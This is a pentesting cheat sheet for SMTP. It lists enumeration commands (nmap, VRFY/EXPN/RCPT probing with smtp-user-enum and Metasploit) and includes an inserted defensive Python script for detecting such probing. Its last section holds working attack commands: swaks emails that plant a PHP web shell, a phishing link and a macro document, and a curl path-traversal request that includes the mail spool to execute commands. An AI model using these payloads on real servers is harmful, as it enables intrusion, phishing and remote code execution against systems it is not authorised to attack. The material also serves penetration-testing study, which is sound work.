25 - Pentesting SMTP

SMTP stands for "Simple Mail Transfer Protocol". It is a protocol used for sending email messages between servers. Most email systems that send mail over the Internet use SMTP to send messages from one server to another, and to deliver messages to local mail clients like Microsoft Outlook or Apple Mail. SMTP servers listen for incoming mail, and then use other protocols to deliver the message to the recipient's mailbox.

nmap

nmap -p 25 -sV -sC -Pn -vv $IP

telnet

telnet $IP 25
|<- VRFY root
|<- VRFY szalek
|<- VRFY admin
|<- VRFY msfadmin

netcat

netcat $IP 25
|<- VRFY root
|<- VRFY szalek
|<- VRFY admin
|<- VRFY msfadmin

smtp-user-enum

sudo apt install smtp-user-enum
smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M EXPN -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP

metasploit

use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set rhosts 10.10.200.211
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) > set USER_FILE /tmp/users.txt
msf auxiliary(smtp_enum) > run
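The VRFY/EXPN/RCPT probing above is noisy on the server side, which is what makes it detectable. As an added defender-side example (not code from the original page), the script below parses a constructed SMTP session log and flags clients that issue many probes, get most of them rejected, and never reach DATA; the log line format and the client addresses are assumptions made for this example, not any real MTA's log format.

```python
"""Flag SMTP clients whose session looks like user enumeration (VRFY/EXPN/RCPT probing)."""
import re
from collections import defaultdict

# Constructed sample log, one server-side event per line; the format is an assumption
# for this example (not any real MTA's): "<time> <client_ip> <COMMAND> <arg> -> <reply>".
SAMPLE_LOG = """\
10:00:01 192.0.2.10 EHLO scanner.example -> 250
10:00:02 192.0.2.10 VRFY root -> 252
10:00:02 192.0.2.10 VRFY szalek -> 550
10:00:03 192.0.2.10 VRFY admin -> 550
10:00:03 192.0.2.10 VRFY msfadmin -> 250
10:00:04 192.0.2.10 EXPN staff -> 502
10:00:05 192.0.2.10 RCPT TO:<bob@example> -> 550
10:00:06 192.0.2.10 RCPT TO:<alice@example> -> 550
10:01:00 198.51.100.7 EHLO relay.partner.example -> 250
10:01:01 198.51.100.7 MAIL FROM:<a@partner.example> -> 250
10:01:01 198.51.100.7 RCPT TO:<alice@example> -> 250
10:01:02 198.51.100.7 DATA -> 354
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (EHLO|HELO|MAIL|RCPT|VRFY|EXPN|DATA)\b(.*?) -> (\d{3})$")
PROBE_CMDS = {"VRFY", "EXPN", "RCPT"}  # the three commands smtp-user-enum's -M modes use

def parse(log):
    """Yield (time, client_ip, command, argument, reply_code) for each well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, ip, cmd, arg, code = m.groups()
            yield ts, ip, cmd, arg.strip(), int(code)

def find_enumerators(log, min_probes=5, min_reject_ratio=0.5):
    """Return {client_ip: stats} for clients that sent many VRFY/EXPN/RCPT probes, had
    most of them rejected (5xx), and never reached DATA, i.e. delivered no real mail."""
    stats = defaultdict(lambda: {"probes": 0, "rejected": 0, "data": 0, "names": []})
    for _ts, ip, cmd, arg, code in parse(log):
        s = stats[ip]
        if cmd in PROBE_CMDS:
            s["probes"] += 1
            s["names"].append(arg)          # keep the probed names for the analyst
            if code >= 500:
                s["rejected"] += 1
        elif cmd == "DATA":
            s["data"] += 1                  # a legitimate sender reaches DATA
    return {
        ip: dict(s) for ip, s in stats.items()
        if s["probes"] >= min_probes and s["data"] == 0
        and s["rejected"] / s["probes"] >= min_reject_ratio
    }
```

Disabling VRFY and EXPN on the MTA removes the first two probe types outright; RCPT probing can only be rate-limited or detected, which is what the DATA-less, mostly-rejected pattern above is for.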

executing command

send email

swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart <?php system($_REQUEST["cmd"]); ?> BodyEnd' --server $IP

send email

swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart <a href="http://192.168.45.206">click me</a> BodyEnd' --server $IP

send email

swaks --to mark@localhost --from admin@michalszalkowski.com --header "EmailHacked" --body 'BodyStart File for you BodyEnd' --attach mymacro.doc --server $IP

execute

curl -k 'https://10.129.84.70/file.php?file=../../../../../../../..//var/mail/UserName%00&cmd=id'